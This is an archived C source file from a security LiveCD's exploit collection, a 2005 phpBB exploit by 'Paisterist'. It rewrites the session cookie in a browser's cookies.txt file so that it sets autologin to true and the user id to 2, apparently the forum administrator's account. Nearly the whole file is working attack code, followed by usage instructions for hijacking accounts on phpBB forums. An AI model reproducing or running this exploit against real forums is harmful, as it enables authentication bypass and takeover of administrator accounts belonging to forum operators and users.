home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / phpbbsession.c < prev    next >
C/C++ Source or Header  |  2005-03-05  |  2KB  |  84 lines

  1. /*
  2. Author: Paisterist
  3. Date: 28-02-05
  4. [N]eo [S]ecurity [T]eam ┬⌐
  5.  
  6. Description: this exploit modify the user id that is in your
  7. cookies.txt (Firefox and Mozilla) file.
  8. You have to log in the forum, with the autologin option unchecked,
  9. then you close the navigator and
  10. execute the exploit.
  11. If you have any problem with the exploit, remove all cookies and do all 
  12. again.
  13.  
  14. Note: you have to put the exploit in the same directory of cookies.txt.
  15. This exploit overwrite all phpbb cookies that have the user id 
  16. specified.
  17.  
  18. I HAVE NOT DISCOVERED THIS VULNERABILITY, I DON'T KNOW WHO HAS 
  19. DISCOVERED IT.
  20.  
  21. By Paisterist
  22.  
  23. http://neosecurityteam.net
  24. http://neosecurityteam.tk
  25.  
  26. Greetz: Hackzatan, Crashcool, Towner, Daemon21, Wokkko, Maxx, 
  27. Arcanhell, Alluz.
  28. */
  29. #include <stdio.h>
  30. #include <stdlib.h>
  31. #include <string.h>
  32.  
  33. int main(int argc, char** argv[]) {
  34. FILE *pointer;
  35. char contenido[10000],
  36.  
  37. cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",cookief[9]="%22%3B%7D", cookiec[106],
  38.  
  39. cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",*pos;
  40. int p=0, i=0;
  41.  
  42. if (argc!=2) {
  43. printf("Usage: phpbb_exploit.exe user_id\n\n");
  44. exit(0);
  45. }
  46. pointer=fopen("cookies.txt", "r");
  47.  
  48. if (pointer) {
  49. fread(contenido, 300, 10, pointer);
  50. fclose(pointer);
  51. } else {
  52. printf("The file can't be open\n");
  53. exit(0);
  54. }
  55.  
  56. strcpy(cookiec, cookie);
  57. strncat(cookiec, argv[1], 6);
  58. strcat(cookiec, cookief);
  59.  
  60. if (pos=strstr(contenido, cookiec)) {
  61. p=pos - contenido;
  62. while (i<92) {
  63. if (cookie_false[i]!=NULL) 
  64. contenido[p]=cookie_false[i];
  65. p++;
  66. i++;
  67. }
  68. }
  69. else {
  70. printf("The file cookies.txt isn't valid for execute the
  71. exploit or the user id is incorrect\n");
  72. exit(0);
  73. }
  74.  
  75. if (pointer=fopen("cookies.txt", "w")) {
  76. fputs(contenido, pointer);
  77. printf("Cookie modified: \n\n%s\n\n", contenido);
  78. printf("The cookies file has overwriten... looks like the exploit has worked");
  79. } else printf("\n\nThe file cookies.txt has not write permissions.");
  80. return 0;
  81. }
  82.  
  83.  
  84.